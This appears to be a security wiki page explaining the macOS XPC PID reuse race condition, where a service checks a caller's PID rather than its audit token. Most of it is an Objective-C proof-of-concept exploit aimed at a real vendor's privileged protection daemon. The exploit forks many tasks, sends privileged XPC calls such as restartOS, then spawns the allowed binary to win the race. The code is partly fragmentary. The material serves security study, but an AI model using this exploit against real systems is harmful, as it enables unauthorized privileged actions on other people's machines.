macOS PID Reuse
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PID Reuse
When a macOS XPC service is checking the called process based on the PID and not on the audit token, it's vulnerable to PID reuse attack. This attack is based on a race condition where an exploit is going to send messages to the XPC service abusing the functionality and just after that, executing posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)
with the allowed binary.
This function will make the allowed binary own the PID but the malicious XPC message would have been sent just before. So, if the XPC service use the PID to authenticate the sender and checks it AFTER the execution of posix_spawn
, it will think it comes from an authorized process.
Exploit example
If you find the function shouldAcceptNewConnection
or a function called by it calling processIdentifier
and not calling auditToken
. It highly probable means that it's verifying the process PID and not the audit token.
Like for example in this image (taken from the reference):
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:
- One that generates several forks
- Each fork will send the payload to the XPC service while executing
just after sending the message.
For the exploit to work it's important to export`` ``
or to put inside the exploit:
asm(".section __DATA,__objc_fork_ok\n"
".no_dead_strip empty\n");
First option using NSTasks
and argument to launch the children to exploit the RC
// Code from
// gcc -framework Foundation expl.m -o expl
#import <Foundation/Foundation.h>
#include <spawn.h>
#include <sys/stat.h>
#define RACE_COUNT 32
#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"
#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/"
// allow fork() between exec()
asm(".section __DATA,__objc_fork_ok\n"
".no_dead_strip empty\n");
extern char **environ;
// defining necessary protocols
@protocol ProtectionService
- (void)startDatabaseUpdate;
- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;
- (void)uninstallProduct;
- (void)installProductUpdate;
- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;
- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;
- (void)triggerLicenseRelatedChecks;
- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;
- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;
- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;
- (void)restartOS;
- (void)resumeScanJob;
- (void)pauseScanJob;
- (void)stopScanJob;
- (void)startScanJob;
- (void)disposeOperationBy:(NSUUID *)arg1;
- (void)subscribeTo:(long long)arg1;
- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;
void child() {
// send the XPC messages
NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];
NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];
xpcConnection.remoteObjectInterface = remoteInterface;
[xpcConnection resume];
[xpcConnection.remoteObjectProxy restartOS];
char target_binary[] = BINARY;
char *target_argv[] = {target_binary, NULL};
posix_spawnattr_t attr;
short flags;
posix_spawnattr_getflags(&attr, &flags);
posix_spawnattr_setflags(&attr, flags);
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
bool create_nstasks() {
NSString *exec = [[NSBundle mainBundle] executablePath];
NSTask *processes[RACE_COUNT];
for (int i = 0; i < RACE_COUNT; i++) {
processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];
int i = 0;
struct timespec ts = {
.tv_sec = 0,
.tv_nsec = 500 * 1000000,
nanosleep(&ts, NULL);
if (++i > 4) {
for (int i = 0; i < RACE_COUNT; i++) {
[processes[i] terminate];
return false;
return true;
int main(int argc, const char * argv[]) {
if(argc > 1) {
// called from the NSTasks
} else {
NSLog(@"Starting the race");
return 0;
Other examples
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